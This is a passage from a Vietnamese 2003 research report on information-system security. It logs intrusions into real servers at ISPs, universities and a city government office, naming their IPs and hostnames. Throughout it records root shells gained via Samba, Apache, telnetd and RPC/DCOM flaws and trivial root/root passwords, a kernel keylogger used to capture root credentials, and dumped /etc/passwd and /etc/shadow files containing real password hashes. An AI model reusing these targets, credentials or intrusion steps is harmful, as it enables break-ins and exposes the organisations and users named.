10:14am 3:00 -csh eip pts/3 31Jul03 rmh -c 1 eip pts/2 7:59pm rmh -c 1 eip pts/4 8:02am rmh -c 1 eip pts/5 4:44am 8:43 1 1 vi AlarmMessage.2003-10-01 eip pts/6 8:39am 5:18 vi AlarmMessage.2003-09-30 eip pts/7 8:42am 5:04 vi AlarmMessage.2003-10-01 root pts/8 1:59pm w ho_eipa# e. Lỗi local Vì quyền root đã chiếm được nên không cần xét đến các lỗi local khác. Ta xem qua file /etc/passwd, có thể server này đã bị tạo user có quyền tương đương root ho_eipa# more /etc/passwd root:x:0:1:Super-User:/:/bin/csh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico cachep01:x:0:1:cachep01@yahoo.com:/:/bin/csh listen:x:37:4:Network Admin:/usr/net/nls: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 16 nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: nomd:x:1000:1000:EIP User:/home/nomd:/bin/csh eip:x:1001:1000:EIP Admin:/home/eip:/bin/csh nms:x:2000:1000:NMS BunDang:/home/nms:/bin/csh same::0:1:Super-User:/:/bin/csh ----------------------------------------------------------------- user same có uid=0, gid=1 có quyền tương đương root. f. Các server lân cận bị khai thác Dùng lệnh arp –a trên server vừa vào được ta thấy kết quả sau: ho_eipa# arp -a Net to Media Table Device IP Address Mask Flags Phys Addr ------ -------------------- --------------- ----- --------------- hme0 10.1.120.1 255.255.255.255 00:00:0c:07:ac:78 hme0 ho_eipb 255.255.255.255 08:00:20:fa:6c:c6 hme1 ho_eipaa 255.255.255.255 SP 08:00:20:fa:47:da hme0 ho_eipa 255.255.255.255 SP 08:00:20:fa:47:da hme1 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00 hme0 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00 ho_eipa# Ta thấy có các host sau 10.1.120.1, ho_eipb, ho_eipaa (chính là ho_eipa vì cùng MAC address) thử telnet 10.1.120.1 ta thấy đây là Switch, ho_eipb là 1 máy Sun. i. ho_eipb 1. hệ điều hành: Solaris 7 2. hostname: ho_eipb 3. Remote exploit: password đơn giản, user root, password root ii. ha_eipa 1. hệ điều hành: Solaris 7 2. hostname: ha_eipa 3. Remote exploit: password đơn giản, user root, password root iii. ha_eipb 1. hệ điều hành: Solaris 7 2. hostname: ha_eipb 3. Remote exploit: password đơn giản, user root, password root iv. Smschoa 1. hệ điều hành: HP-UX 2. hostname: smschoa 3. Local IP: 10.1.80.12 4. Remote exploit: password đơn giản, user root, password root ho_eipa# telnet 10.1.80.12 Trying 10.1.80.12... Connected to 10.1.80.12. Escape character is '^]'. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 17 HP-UX smschoa B.11.00 U 9000/800 (tb) login: root Password: Please wait...checking for disk quotas (c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved. (c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of California (c)Copyright 1980, 1984, 1986 Novell, Inc. (c)Copyright 1986-1992 Sun Microsystems, Inc. (c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology (c)Copyright 1989-1993 The Open Software Foundation, Inc. (c)Copyright 1986 Digital Equipment Corp. (c)Copyright 1990 Motorola, Inc. (c)Copyright 1990, 1991, 1992 Cornell University (c)Copyright 1989-1991 The University of Maryland (c)Copyright 1988 Carnegie Mellon University (c)Copyright 1991-1997 Mentat, Inc. (c)Copyright 1996 Morning Star Technologies, Inc. (c)Copyright 1996 Progressive Systems, Inc. (c)Copyright 1997 Isogon Corporation RESTRICTED RIGHTS LEGEND Use, duplication, or disclosure by the U.S. Government is subject to restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013. Hewlett-Packard Company 3000 Hanover Street Palo Alto, CA 94304 U.S.A. Rights for non-DOD U.S. Government Departments and Agencies are as set forth in FAR 52.227-19(c)(1,2). You have mail. Value of TERM has been set to "vt100". WARNING: YOU ARE SUPERUSER !! smschoa:root> w 2:02pm up 49 days, 13:03, 1 user, load average: 4.32, 3.84, 5.02 User tty login@ idle JCPU PCPU what root pts/tb 2:02p v. Smschob 1. hệ điều hành: HP-UX 2. hostname: smschob 3. Local IP: 10.1.80.13 4. Remote exploit: password đơn giản, user root, password root smschoa:root> arp -a smschob (192.1.1.3) at 0:30:6e:1e:ed:2e ether Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 18 10.1.80.1 (10.1.80.1) at 0:0:c:7:ac:50 ether smschob (10.1.80.13) at 0:30:6e:1e:ed:5e ether smschoa:root> telnet 10.1.80.13 Trying... Connected to 10.1.80.13. Escape character is '^]'. Local flow control on Telnet TERMINAL-SPEED option ON HP-UX smschob B.11.00 U 9000/800 (ta) login: root Password: Please wait...checking for disk quotas (c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved. (c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of California (c)Copyright 1980, 1984, 1986 Novell, Inc. (c)Copyright 1986-1992 Sun Microsystems, Inc. (c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology (c)Copyright 1989-1993 The Open Software Foundation, Inc. (c)Copyright 1986 Digital Equipment Corp. (c)Copyright 1990 Motorola, Inc. (c)Copyright 1990, 1991, 1992 Cornell University (c)Copyright 1989-1991 The University of Maryland (c)Copyright 1988 Carnegie Mellon University (c)Copyright 1991-1997 Mentat, Inc. (c)Copyright 1996 Morning Star Technologies, Inc. (c)Copyright 1996 Progressive Systems, Inc. (c)Copyright 1997 Isogon Corporation RESTRICTED RIGHTS LEGEND Use, duplication, or disclosure by the U.S. Government is subject to restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013. Hewlett-Packard Company 3000 Hanover Street Palo Alto, CA 94304 U.S.A. Rights for non-DOD U.S. Government Departments and Agencies are as set forth in FAR 52.227-19(c)(1,2). You have mail. Value of TERM has been set to "vt100". WARNING: YOU ARE SUPERUSER !! smschob:root> w 2:24pm up 101 days, 2:30, 1 user, load average: 0.59, 0.37, 0.35 User tty login@ idle JCPU PCPU what root pts/ta 2:24pm w smschob:root> Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 19 4) 203.162.45.152 (FPT) a. Hệ điều hành: RedHat Linux 7.2 b. Lỗi remote: Apache + openssl Lỗi này đã được thông báo trên internet khá lâu, các web server chạy apache version dưới 1.3.27 và openssl có version cũ hơn 0.9.6. Exploit code cũng đã được public trên các site hacker, security. Khai thác thành công lỗi này ta có được shell dưới quyền user chạy apache qua port 80 ( thông thường là user apache ). Đối với server này ta chiếm được shell với quyền của user apache. Tiếp theo ta đưa chương trình khai thác lỗi local vào để chiếm quyền root. c. Lỗi local: ptrace Đa số các kernel Linux version nhỏ hơn 2.4.20 đều bị lỗi này, nếu kernel được biên dịch lại từ source thì không bị lỗi. 5) 203.162.42.67 ( sng.pwc.com.vn) a. Hệ điều hành: RedHat Linux 9.0 b. Local IP: 10.161.16.254 c. Lỗi remote: Samba exploit Lỗi remote Samba trên server này cho phép ta chiếm được shell với quyền root. Server này là gateway và proxy server, có 02 card mạng Copy màn hình thực hiện và file /etc/passwd, /etc/shadow 6) 203.162.35.75 (mail.ittivietnam.com) a. Hệ điều hành: RedHat Linux 7.1 b. Lỗi remote: Samba, apache+ssl Server này bị xâm nhập thành công qua lỗi apache (version 1.3.23). Chiếm được remote shell dưới quyền user apache. c. Lỗi local: ptrace d. Các backdoor do hacker khác để lại Khi xâm nhập vào hệ thống, và chiếm quyền root, một số backdoor do các hacker xâm nhập vào đã được tìm thấy, các file quan trọng trên hệ thống như ls, netstat, ifconfig đều đã bị thay thế. Trong các lần thâm nhập vào, ta có thể phát hiện ra việc các hacker dùng server này để scan và làm bàn đạp tấn công các server khác: Dùng lệnh ps có thể phát hiện ra các proccess dùng để scan này. bash-2.05a# ps ax|more PID TTY STAT TIME COMMAND 1 ? S 0:06 init 2 ? SW 0:00 [keventd] 3 ? SWN 0:00 [ksoftirqd_CPU0] 4 ? SW 0:00 [kswapd] 5 ? SW 0:00 [bdflush] 6 ? SW 0:00 [kupdated] 7 ? SW 0:00 [mdrecoveryd] 15 ? SW 0:16 [kjournald] 99 ? SW 0:00 [khubd] Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 20 227 ? SW 0:00 [kjournald] 228 ? SW 0:01 [kjournald] 229 ? SW 0:00 [kjournald] 727 ? S 0:08 syslogd -m 0 732 ? S 0:01 klogd -x 1274 ? S 0:00 CROND 1275 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 1288 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 1289 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 1290 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 1291 ? Z 0:00 [awk ] 1300 ? T 0:00 /bin/hostname 1301 ? Z 0:00 [hostname ] 1388 ? S 0:00 /usr/sbin/sshd 1421 ? S 0:03 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid 1462 ? S 0:00 sendmail: accepting connections 1481 ? S 0:00 gpm -t ps/2 -m /dev/mouse 1504 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY - DHAVE_AUTH_ 1530 ? S 0:00 crond 1663 ? S 0:00 rhnsd --interval 120 1670 2 S 0:00 /sbin/mingetty tty2 1671 3 S 0:00 /sbin/mingetty tty3 1672 4 S 0:00 /sbin/mingetty tty4 1673 5 S 0:00 /sbin/mingetty tty5 1674 6 S 0:00 /sbin/mingetty tty6 1850 ? S 0:00 CROND 1851 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 1864 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 1865 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 1866 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 1867 ? Z 0:00 [awk ] 1873 ? T 0:00 /bin/hostname 1874 ? Z 0:00 [hostname ] 2617 ? T 0:00 ./ssvuln 210.185.ssl 210.185.ssl.out 35 2625 ? Z 0:00 [ssvuln ] 2666 ? T 0:00 ./ssvuln 210.186.ssl 210.186.ssl.out 35 2678 ? Z 0:00 [ssvuln ] 2866 ? S 0:00 /usr/sbin/sshd 2873 ? S 0:00 -bash 2924 ? S 0:00 ls --color=tty 2938 ? S 0:00 /bin/sh ./assl 210.188 2939 ? R 1:47 ./pscan2 210.188 443 2940 ? T 0:00 ./pscan2 210.188 443 2941 ? Z 0:00 [pscan2 ] 2947 ? S 0:00 sendmail: server msr91.hinet.net [168.95.4.191] child w 2948 ? S 0:00 sendmail: ./h7M0pMI02948 msr91.hinet.net [168.95.4.191] 2954 ? S 0:00 sendmail: server [203.162.23.26] child wait Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 21 2957 ? S 0:00 sendmail: server [203.162.23.26] cmd read 2958 ? R 0:00 ps ax 2959 ? R 0:00 -bash 7581 1 S 0:00 /sbin/mingetty tty1 30246 ? S 0:00 -bash 30419 ? T 0:00 ./ssvuln 215.30.ssl 215.30.ssl.out 35 30423 ? Z 0:00 [ssvuln ] 30424 ? T 0:00 ./oops 215.30.ssl.out 30426 ? Z 0:00 [oops ] 30647 ? S 0:00 CROND 30648 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 30659 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 30660 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 30661 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 30662 ? Z 0:00 [awk ] 30685 ? T 0:00 /bin/hostname 30686 ? Z 0:00 [hostname ] 31703 ? S 0:00 CROND 31704 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 31717 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 31718 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 31719 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 31720 ? Z 0:00 [awk ] 31729 ? T 0:00 /bin/hostname 31730 ? Z 0:00 [hostname ] 32385 ? S 0:00 CROND 32386 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.hourly 32399 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron 32400 ? S 0:00 awk -v progname=/etc/cron.hourly/openwebmail.cron progn 32401 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi- bin/openweb 32402 ? Z 0:00 [awk ] 32423 ? T 0:00 /bin/hostname 32424 ? Z 0:00 [hostname ] 32425 ? S 0:00 CROND 32426 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.daily 32589 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem root 32615 ? S 0:00 awk -v progname=/etc/cron.daily/makewhatis.cron prognam 32617 ? Z 0:00 [awk ] 32743 ? T 0:00 /usr/bin/awk 32748 ? Z 0:00 [awk ] 1643 ? S 0:00 /usr/sbin/atd 1363 ? S 0:00 named -u named 1365 ? S 0:00 named -u named 1366 ? S 0:00 named -u named 1367 ? S 0:00 named -u named 1368 ? S 0:00 named -u named Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 22 780 ? S 0:00 rpc.statd 752 ? S 0:00 portmap 1584 ? S 0:00 xfs -droppriv -daemon 1508 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY – (bỏ bớt một số dòng tiếp theo) bash-2.05a# 7) 203.162.33.35-router (Đại học sư phạm Tp HCM) a. version IOS dhsp#show version Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-I-M), Version 12.1(16), RELEASE SOFTWARE (fc1) Copyright (c) 1986-2002 by cisco Systems, Inc. Compiled Tue 09-Jul-02 02:33 by kellythw Image text-base: 0x80008088, data-base: 0x8082C938 ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE (fc1) dhsp uptime is 1 week, 4 days, 9 hours, 28 minutes System returned to ROM by power-on System image file is "flash:c2600-i-mz.121-16.bin" cisco 2620XM (MPC860) processor (revision 0x100) with 53248K/12288K bytes of memory. Processor board ID JAD07070YJF (2656094087) M860 processor: part number 5, mask 2 Bridging software. X.25 software, Version 3.0.0. 1 FastEthernet/IEEE 802.3 interface(s) 10 Low-speed serial(sync/async) network interface(s) 32K bytes of non-volatile configuration memory. 16384K bytes of processor board System flash (Read/Write) Configuration register is 0x2102 b. lỗi bảo mật Lỗi cơ bản nhất đó là không đặt password telnet, khi telnet vào router ta được ngay …. [root@bugsearch /]# telnet 203.162.35.33 Trying 203.162.35.33... Connected to 203.162.35.33 (203.162.35.33). Escape character is '^]'. dhsp> 4.4 Bước tiếp theo, thử enable, password được hỏi, sau vài lần thử, ta thành công với một password đơn giản. [root@bugsearch /]# telnet 203.162.35.33 Trying 203.162.35.33... Connected to 203.162.35.33 (203.162.35.33). Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 23 Escape character is '^]'. dhsp> dhsp> dhsp> dhsp>en Password: Password: dhsp# Với quyền này ta hoàn toàn có khả năng sửa đổi được cấu hình router, tuy nhiên vì đây chưa phải là mục đích cuối cùng nên ta cần khai thác router để tìm cách tấn công vào web server. 8) 203.162.17.97 (hot.vnn.vn) Đây là server webhosting của vasc, có khá nhiều trang web được hosting trên server này, kể cả www.bkav.com.vn (có thể tham khảo file httpd.conf). a. Hệ điều hành: Solaris 7 b. Lỗi remote: Telnetd, bị khai thác và lấy remote shell dưới quyền user bin. c. Lỗi local: priocntl Tương tự như server suntest.vnnic.net, lỗi này cũng được khai thác thành công trên server này. 9) 203.162.4.30 (VDC2) a. Hệ điều hành: Solaris 7 b. Lỗi remote: telnetd c. Lỗi local: printioctl 10) 203.162.0.41 ( radius.vnn.vn) a. Hệ điều hành: Solaris 7 b. Lỗi remote: telnetd c. Lỗi local: priocntl 11) 203.144.70.17 ( cambodia) a. Hệ điều hành: Linux Suse b. Lỗi remote: Samba c. Lỗi local: ptrace 12) 203.162.17.142 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM date Tue Jul 29 02:04:53 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 24 C:\WINNT\system32>dir dir Volume in drive C is VIB Volume Serial Number is 381C-0A3F Directory of C:\WINNT\system32 07/29/2003 01:08a . 07/29/2003 01:08a .. 12/03/2002 04:16p 1,070 $winnt$.inf 06/27/2001 01:47p 2,151 12520437.cpx 06/27/2001 01:47p 2,233 12520850.cpx 06/10/1999 02:50p 437,528 401COMUPD.EXE 12/07/1999 12:00p 32,016 aaaamon.dll 12/07/1999 12:00p 67,344 access.cpl 08/29/2002 07:06a 64,512 acctres.dll 12/07/1999 12:00p 150,800 accwiz.exe 12/07/1999 12:00p 61,952 acelpdec.ax 12/07/1999 12:00p 131,856 acledit.dll 07/22/2002 12:05p 78,096 aclui.dll 12/07/1999 12:00p 4,368 acsetupc.dll 12/07/1999 12:00p 17,168 acsetups.exe 13) 203.162.17.142 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM date Fri Aug 29 15:23:53 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg C:\WINNT\system32>cd d: cd d: D:\ C:\WINNT\system32>d: d: The device is not ready. C:\WINNT\system32>e: e: The system cannot find the drive specified. C:\WINNT\system32>dir c:\ dir c:\ Volume in drive C has no label. Volume Serial Number is 5057-5682 Directory of c:\ 11/07/2002 06:35p 2,975 1 Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 25 11/07/2002 06:21p 0 a 11/06/2002 11:58a Documents and Settings 11/06/2002 11:39a Inetpub 04/08/2003 08:18a 13,030 PDOXUSRS.NET 02/28/2003 03:23p 3,072,573 pi_winproxy.exe 02/28/2003 03:24p Program Files 01/15/2003 08:32a SOFT 11/06/2002 04:39p virus 02/27/2003 01:55p WINNT 11/06/2002 05:03p 1,958 WinProxy.cfg 5 File(s) 3,090,536 bytes 6 Dir(s) 5,906,014,208 bytes free C:\WINNT\system32> 14) 203.162.5.126 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM date 072823552003 Mon Jul 28 23:55:00 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. D:\WINNT\system32>mkdir bg mkdir bg A subdirectory or file bg already exists. D:\WINNT\system32>c: c: C:\>dir dir Volume in drive C has no label. Volume Serial Number is 947B-CC93 Directory of C:\ 07/29/2003 02:05p 111 07/02/2003 04:46p 3797132a906c136b43bf566cd6582ae3 06/18/2003 05:05p AMERIC 07/10/2003 11:50a AuditNTPass 07/30/2003 08:12p CISCO 04/23/2003 06:01p 6,694 CLDMA.LOG 11/21/2002 10:01a Container 11/03/2002 02:09p demo_CCNA 06/28/2003 03:41p Download 15) 203.162.6.115 - www.cp.com.vn a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM Tue Jul 29 01:20:01 ICT 2003 Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 26 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg C:\WINNT\system32>nslookup nslookup Default Server: hcmc.saigonnet.vn Address: 203.162.6.97 C:\WINNT\system32>ipconfig /all ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : cpvietnam Primary DNS Suffix . . . . . . . : cpvietnam Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : cpvietnam www.cp.com.vn Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : www.cp.com.vn Description . . . . . . . . . . . : Compaq NC7760 Gigabit Server Adapter Physical Address. . . . . . . . . : 00-08-02-EF-D2-98 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 203.162.6.115 Subnet Mask . . . . . . . . . . . : 255.255.255.224 Default Gateway . . . . . . . . . : 203.162.6.100 DNS Servers . . . . . . . . . . . : 203.162.6.97 203.162.0.11 Primary WINS Server . . . . . . . : 199.1.1.31 C:\WINNT\system32>dir c: dir c: Volume in drive C has no label. Volume Serial Number is FC0D-D2A5 Directory of C:\WINNT\system32 07/29/2003 12:16a . 07/29/2003 12:16a .. 08/19/2002 07:54a 304 $winnt$.inf 03/29/2002 03:32p 2,151 12520437.cpx 03/29/2002 03:32p 2,233 12520850.cpx 16) 203.162.7.81 a. Hệ điều hành: WindowNT b. Lỗi bị khai thác: RPC, DCOM Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 27 date Fri Aug 1 16:24:34 ICT 2003 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>mkdir bg mkdir bg C:\WINNT\system32>ipconfig /all ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : rep1 Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : Yes WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82546EB Based Dual Port Network Connection #2 Physical Address. . . . . . . . . : 00-07-E9-04-E3-B8 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 203.162.7.81 Subnet Mask . . . . . . . . . . . : 255.255.255.224 Default Gateway . . . . . . . . . : 203.162.7.67 DNS Servers . . . . . . . . . . . : Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82546EB Based Dual Port Network Connection Physical Address. . . . . . . . . : 00-07-E9-04-E3-B9 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 203.160.0.12 Subnet Mask . . . . . . . . . . . : 255.255.255.0 IP Address. . . . . . . . . . . . : 192.168.49.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 203.162.7.80 PPP adapter RAS Server (Dial In) Interface: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-53-45-00-00-00 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.50.1 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 28 PPP adapter {3671431D-5E69-4B81-A8E3-B397BD3D5581}: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-53-45-00-00-00 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.0.0.17 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 17. Máy chủ ITPMO.hochiminhcity.gov.vn (203.162.97.125) và các máy chủ liên qua. Đây là các server được admin upgrade khá thường xuyên. Qua khảo sát, chúng tôi thấy không thể dùng exploit trực tiếp trên các lỗi của OS. Nhóm nghiên cứu đã phải có phương thức khác với những phương thức đã tiến hành với các máy chủ khác để xâm nhập. Cũng xin lưu ý là việc xâm nhập thành công vào ITPMO cũng nhờ thêm vào sự quen biết mang tính chất xã hội của nhóm nghiên cứu với admin của máy chủ này. Nhóm nghiên cứu tập trung đầu tiên vào điểm yếu nhất của hệ thống: Khoa Toán trường KHTN. Đầu tiên xâm nhập được máy chủ của thư viện KHTN „ Khai thác thành công lỗi Samba, chiếm được root shell. „ Cài key-logger theo kiểu load kernel module „ Có thể lấy được password login từ console hoặc remote „ Kết quả: lấy được passwd của user root Sau đó xâm nhập sang máy chủ portal.math.hcmuns.edu.vn, mathdep.hcmuns.edu.vn qua các lỗi tương tự. Sau đó, xâm nhập qua đích cuối cùng là itpmo vì máy này có cùng cơ sở dữ liệu người sử dụng với máy trên !!! [vdchai@itpmo vdchai]$ [vdchai@itpmo vdchai]$ su Password: [root@itpmo vdchai]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 29 User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/home/httpd:/sbin/nologin webalizer:x:67:67:Webalizer:/home/httpd/html/usage:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash iportal:x:100:48:iPortal:/home/iportal:/bin/bash [root@itpmo vdchai]# cat /etc/shadow root:$1$eidlISUT$RGprKeXY9JX7VUaaumUxA/:12347:0:99999:7::: bin:*:12347:0:99999:7::: daemon:*:12347:0:99999:7::: adm:*:12347:0:99999:7::: lp:*:12347:0:99999:7::: sync:*:12347:0:99999:7::: shutdown:*:12347:0:99999:7::: halt:*:12347:0:99999:7::: mail:*:12347:0:99999:7::: uucp:*:12347:0:99999:7::: operator:*:12347:0:99999:7::: ftp:*:12347:0:99999:7::: nobody:*:12347:0:99999:7::: rpm:!!:12347:0:99999:7::: vcsa:!!:12347:0:99999:7::: nscd:!!:12347:0:99999:7::: sshd:!!:12347:0:99999:7::: rpc:!!:12347:0:99999:7::: rpcuser:!!:12347:0:99999:7::: nfsnobody:!!:12347:0:99999:7::: mailnull:!!:12347:0:99999:7::: smmsp:!!:12347:0:99999:7::: pcap:!!:12347:0:99999:7::: apache:!!:12347:0:99999:7::: webalizer:!!:12347:0:99999:7::: named:!!:12347:0:99999:7::: ldap:!!:12347:0:99999:7::: postgres:!!:12347:0:99999:7::: iportal:$1$Z1vq0nOy$Uu4aNNrqNT1A0zAdRS1O3/:12347:0:99999:7::: [root@itpmo vdchai]# /sbin/ifconfig eth0 Link encap:Ethernet HWaddr 00:06:29:D5:80:0C inet addr:203.162.97.125 Bcast:203.162.97.127 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6940668 errors:0 dropped:0 overruns:0 frame:0 TX packets:5563597 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:2744225979 (2617.0 Mb) TX bytes:2960588810 (2823.4 Mb) Interrupt:27 Base address:0x2000 18. Một số máy chủ khác của ĐH KHTN • Web server khoa Vật lý (lỗi Samba và apache) • Web server khoa Hoá học (lỗi samba) • Mail server Trung tâm tin học (lỗi samba) Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 30 • Mailbox của Trường KHTN: export everyone thư mục mailbox, có thể đọc mail bất kỳ user nào từ một máy ở xa. 4.5 Xây dựng máy chủ Web “an tòan”: thử thách và kết quả. Máy chủ Web an tòan là gì ? đó là một vấn đề mà tất cả chúng ta đều quan tâm. Tuy nhiên, định nghĩa “an tòan” cho máy chủ rất khó lại mang tính chất tương đối vì an tòan ngày hôm nay có thể trở thành không an tòan trong ngày mai. Cùng với Hội đồng xét duyệt đề tài, nhóm triển khai dự án đã thống nhất “máy chủ an tòan là máy chủ mà độ an tòan được đánh giá 